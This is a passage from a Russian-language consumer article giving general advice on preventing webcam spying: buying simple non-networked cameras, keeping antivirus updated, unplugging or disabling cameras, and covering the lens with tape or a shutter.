Вышесказанного достаточно, чтобы начать смотреть на веб-камеры с подозрением. К счастью, достаточно легко убедиться, что никто не шпионит за вами.

Выбирайте простейшие веб-камеры

Вы можете купить веб-камеру или системы домашнего наблюдения, которые приглядывают за домом в ваше отсутствие. Проблема в том, что хакер может видеть тоже, что и вы.

Желательно не покупать что-то с приставкой Smart. Возьмите самую простую веб-камеру. У неё не должно быть возможности подключаться через интернет.

Обновляйте приложения безопасности на компьютере

Даже если вы не подключаетесь к веб-камере через интернет, хакеры могут использовать компьютер при помощи специальных приложений. По этой причине важно скачать надёжный антивирус и обновлять его базы. Периодически нужно сканировать компьютер на наличие вирусов. Хороший антивирус защитит системы при попытке вируса проникнуть в неё.

Если у вас веб-камера USB, отключайте её, когда не пользуетесь. Насколько бы хорош хакер ни был, он не сможет смотреть через веб-камеру, которая не подключена к разъёму. Включайте камеру только когда пользуетесь ей, потом снова отключайте.

Это легко делается на компьютере, где веб-камера отдельная. В ноутбуках и планшетах камера встроенная и её нельзя отключить физически. Отключение выполняется программно. В разных операционных системах это делается по-разному.

Правда, если злоумышленник получит доступ к вашей системе, он сможет снова включить веб-камеру.

Заклеивайте камеру, когда не пользуетесь

Хакер может быть достаточно умным, чтобы проникнуть через вашу защиту или включить камеру. При этом он ничего не сможет поделать, если камера заклеена.

Если вы не собираетесь пользоваться ей в ближайшее время, наклейте на камеру изоленту или поверните так, чтобы она упиралась во что-то и изображения не было. При необходимости можно будет повернуть камеру на себя и снять изоленту.

Если камера нужна вам для общения с семьёй и дистанционной работы, можно купить специальные скользящие заслонки для неё. Они прикрепляются к камере ноутбука и работают как дверь. Когда вам нужно показать своё лицо, откройте эту дверь и позвольте камере видеть вас. Когда общение закончено, закройте заслонку.

Лучшие веб-камеры 2021 года

Поделиться:
Нет комментариев

    Добавить комментарий

    Ваш e-mail не будет опубликован. Все поля обязательны для заполнения.